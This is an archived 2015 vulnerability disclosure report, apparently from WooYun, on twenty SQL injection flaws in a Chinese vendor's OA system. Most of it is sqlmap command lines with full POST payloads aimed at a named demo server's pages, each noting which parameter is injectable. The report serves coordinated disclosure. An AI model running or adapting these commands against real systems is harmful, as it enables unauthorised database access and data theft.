
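Vulnerability summary

Bug ID: wooyun-2015-0121216

Vulnerability title: I want to round up every injection flaw in a certain OA system: another 20 high-risk injections in one batch

Related vendor: National Internet Emergency Center (CNCERT)

Author: goubuli

Submitted: 2015-06-18 10:32

Fixed: 2015-09-21 08:46

Published: 2015-09-21 08:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]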



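Vulnerability details

Disclosure status:

2015-06-18: Details reported to the vendor; awaiting vendor handling
2015-06-23: Vendor confirmed; details disclosed to the vendor only
2015-06-26: Details opened to third-party security partners
2015-08-17: Details disclosed to core white hats and experts in related fields
2015-08-27: Details disclosed to regular white hats
2015-09-06: Details disclosed to intern white hats
2015-09-21: Details disclosed to the public

Brief description:

RT (as the title says)
Two types, GET injection and POST injection, submitted together in one batch
There should be no injections left; I have dug them all out... ( ̄▽ ̄)"

Detailed description:

So many submissions again, so tiring... and digging them up was tiring too...

Vendor: 广州市名将软件开发有限公司 (Guangzhou Mingjiang Software Development Co., Ltd.)
Official site: http://oa.fg.net.cn/index.asp
Official demo: http://112.124.41.23:38888/
Original address: http://oa.yf1668.com
Tested on the demo: MSSQL injection, DBA privileges.


A thumbs-up to the reviewers, this bug was reviewed so quickly... WooYun: 20 high-risk injections in a certain OA system, batched (no login required, DBA privileges)
I have not even finished submitting this one


Non-duplicate injection vulnerabilities:
Injection 1: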

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomNeed.aspx" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTg1OTA5MjgxMw9kFgJmD2QWBgIPDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFEk5lZWRWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDZGZnZAICDw8WAh8FBQUgZmdkZ2RkAgMPDxYCHwUFA2RmZ2RkAgQPDxYCHwUFA2RmZ2RkAgUPDxYCHwUFAmdkZGQCBg8PFgIfBQUCZGdkZAICDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8FBQExZGQCGw8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkWJ6Yz2XAgQ9Jn1lsamNxEmQpQ0k%3D&DropDownList1=NeedContent&TextBox1=d&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGwKMtcioDwK%2FyLvNDgKihNChCgKBxq7sDgKEy5dZAunOtdMDAq%2BZ%2BoUHAue0yIgEAp3hof8OAr6Ar9sKAt2G%2FcIOAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AICo8yu9ggC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wlkZxA1t7YKOtF1j%2FkICG43F3980Q%3D%3D" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 2:

sqlmap.py -u "http://112.124.41.23:38888/CRM/MySongYang.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwULLTE4ODMzODkwMDEPZBYCZg9kFgYCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGQ8PFgIeBFRleHQFATFkZAIbDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkBbkbM1eruLsMm1cFLMg0GiKcB6U%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=23&ImageButton4.y=8&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGAKZ2P%2F5DAK%2FyLvNDgKllePHCAKH%2F8WBDgLqvNPTDQLo5NPqAgLHrMH7DQKKpcrXCwKO6fqcCwKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJ9ZVcIIV%2B9rWMysuGJpH3gjstVKI%3D" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 3:

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomHate.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2ThPqs2rydL4pxKWeqvpQcFMMq3Gg%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=14&ImageButton4.y=3&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQLk4ZnPCAK%2FyLvNDgKBsLzQCwLcgsVtAr3bqNwGAuydjIcPAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AIC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wk7gHMuqX53jS4jILenuBfWIzb7eg%3D%3D" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 4:

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomBack.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2QMuetnJRHpNX%2BCRAJ5%2BxtTe9ANgQ%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=22&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQL4r7rYCgK%2FyLvNDgLxkp2pBwLSzcTNDgL7tqfgBgLCzZjMDgKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJVMjI%2FZGa2ooRTzgtCMPCWXjgxEA%3D" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 5:

sqlmap.py -u "http://112.124.41.23:38888/Supply/BuyLog.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAmQWAmYPZBYGAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATJkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%2FSUQ9MmQWAmYPFQEG5Lq65Y%2BCZAICDw8WAh8FBQZkZmRmZGZkZAIDDw8WAh8FBQU0NS4wMGRkAgQPDxYCHwUFBTQ1LjAwZGQCBQ8PFgIfBQUHNDU0NS4wMGRkAgYPDxYCHwUFBTQ1LjAwZGQCBw8PFgIfBQUHNDU1NS4wMGRkAggPDxYCHwUFCeacquS6pOS7mGRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%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%2BzWutehswyKBxcS%2FFOA%3D%3D&TextBox1=a&ImageButton4.x=26&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHn9L8CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRAs2InAwbiXBy5WDDjVCXekL7Jo" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 6:

sqlmap.py -u "http://112.124.41.23:38888/Project/ShiShiRiZhi.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkAhYPDxYCHgRUZXh0BQExZGQCGA8PFgIfAgUBMGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYKBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZCHcz8kyvxhMS0bB96rUVgXWRwTO&TextBox1=abc&ImageButton4.x=19&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKZ1qS9AQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRSSXtGvMZJxYdVngKONF3%2Fkh199" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 7:

sqlmap.py -u "http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs
ProjectName injection


Injection 8:

sqlmap.py -u "http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TWfrWXa7Z4Q5q4uAW%2FRDr6vRCFkg%3D%3D&TextBox1=abc&ImageButton4.x=31&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgK8lsXSDgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CQY1AT1VSwATlrGbpmZavKKaulyh" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 9:

sqlmap.py -u "http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs
ProjectName is vulnerable to injection


Injection 10:

sqlmap.py -u "http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwULLTExOTM1Mjc1NzYPZBYCZg9kFgYCDA88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCFg8PFgIeBFRleHQFATFkZAIYDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkJjBlmE6L8Xs%2FINq88smT0psJeSk%3D&TextBox1=abc&ImageButton4.x=30&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKjlre5BALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cbx%2BgsItWEB2Ut1NImQ7DCLeN0xP" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 11:

sqlmap.py -u "http://112.124.41.23:38888/Project/ProjectJinDu.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKMTM5MzE2MTU5Mg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RMkeNiL4fyySar6FjKQtmkxWtf8A%3D%3D&TextBox1=11&ImageButton4.x=25&ImageButton4.y=9&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLU8sK%2FBALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cd%2BcuY%2BBUJ%2B0TUV9VWVKrnpFqh8Y" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 12:

sqlmap.py -u "http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql"
HeTongName is vulnerable to injection


Injection 13:

sqlmap.py -u "http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql" --batch --data "__VIEWSTATE=%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%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%2F1cZAgrUo079zthVbF%2FJlIshA%3D&TextBox1=1&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEALiitv6CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbFmNj2RdRLlmhie89lDYFzXBRwA" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 14:

sqlmap.py -u "http://112.124.41.23:38888/Supply/SupplysLink.aspx?GongYingShang=" --dbms="mssql"
GongYingShang is vulnerable to injection


Injection 15:

sqlmap.py -u "http://112.124.41.23:38888/Supply/SupplysLink.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGFN1cHBseUxpbmtWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDc2RmZAICDw8WAh8FBQZkc2Zkc2ZkZAIDDw8WAh8FBQNzZGZkZAIEDw8WAh8FBQPnlLdkZAIFDw8WAh8FBQnmlq%2FokoLoiqxkZAIGDw8WAh8FBQY2NDY0NTZkZAIHDw8WAh8FBQM0NTZkZAIIDw8WAh8FBQM0NTZkZAICDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkI6DHR6wwLdTi6NFydX%2Bn%2F1dxUDc%3D&TextBox1=ASD&ImageButton4.x=36&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwLdsLmiDQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CUix3ea0%2FVLYbWVfqNDYfRbSQYqU" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 16:

sqlmap.py -u "http://112.124.41.23:38888/Supply/BuyOrder.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMWRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQnV5T3JkZXJWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEGZGZkZmRmZAICDw8WAh8FBQVzZGZzZmRkAgMPDxYCHwUFA3NkZmRkAgQPDxYCHwUFDOW5v%2BW3nuiHtOS%2FoWRkAgUPDxYCHwUFBWFkbWluZGQCBg8PFgIfBQUQMjAxMC0xLTEgMDowMDowMGRkAgcPDxYCHwUFDOetieW%2BheWuoeaguGRkAgIPDxYCHgdWaXNpYmxlaGRkAhYPDxYCHwUFATFkZAIYDw8WAh8FBQExZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgsFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBRhHVkRhdGEkY3RsMDIkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TXut0IcMwlZoFtT3iDkc6VPhYrTA%3D%3D&TextBox1=df&ImageButton4.x=22&ImageButton4.y=6&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwKVhsOBCgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CZ%2F3Zt3e%2FITPYlHuDKMUU4kWebgQ" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 17:

sqlmap.py -u "http://112.124.41.23:38888/Supply/Supplys.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUVU3VwcGx5c1ZpZXcuYXNweD9JRD0yZBYCZg8VAQZzZGZzZGZkAgIPDxYCHwUFBXNkZnNmZGQCAw8PFgIfBQUFc2Rmc2ZkZAIEDw8WAh8FBQQ0NTY1ZGQCBQ8PFgIfBQUENDU2NGRkAgYPDxYCHwUFAzU0NmRkAgcPDxYCHwUFAzQ1NmRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYQZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFFVN1cHBseXNWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEM5bm%2F5bee6Ie05L%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%3D&TextBox1=sdf&ImageButton4.x=23&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHp4CLAwLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CVC9mLjd61k9IXwsoe8r75K0c3hm" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 18:

sqlmap.py -u "http://112.124.41.23:38888/Sell/Contract.aspx"--dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQ29udHJhY3RWaWV3LmFzcHg%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%2BH5a6h5qC4ZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkuAqEbS7Zc03UpA1ESiQ3gUmJJEo%3D&TextBox1=ads&ImageButton4.x=20&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKk6arfBgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CcF0Fd6sfdJtgBZojxMdO5NePpgI" -p TextBox1
TextBox1 is vulnerable to POST injection


Injection 19:

sqlmap.py -u "http://112.124.41.23:38888/Car/CarLog.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTQ5OTIxMTYwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCwUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjYFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZMsv76oU%2BcnIVl9sEL5HPn%2BdLzGG&DropDownList2=CarName&TextBox3=asd&ImageButton4.x=20&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEwKMj7HHAgLf5572CwLnqr7bDwKayI7FDwLgk7KqAwLs0Yq1BQLSwv2aBALSwqXRBQLSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CTFkpjF2elTwIxiQuU%2BQCx%2FJ9NMz" -p TextBox3 --dbms="mssql"
TextBox3 is vulnerable to POST injection


Injection 20:

sqlmap.py -u "http://112.124.41.23:38888/DocFile/DangAn.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExMDg2MDE4MzgPZBYCZg9kFggCAQ8PFgIeBFRleHRlZGQCDg88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGA8PFgIfAAUBMWRkAhoPDxYCHwAFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RZGyacswZw0WUqdtMoHBbw71m9hg%3D%3D&TextBox1=abc&ImageButton4.x=23&ImageButton4.y=10&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLNrKeTAQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbOjWL4mdYarCP4ShF8FGyvhczRv" -p TextBox1 --dbms="mssql"
TextBox1 is vulnerable to POST injection


So tired
=======================================================================
Data proof

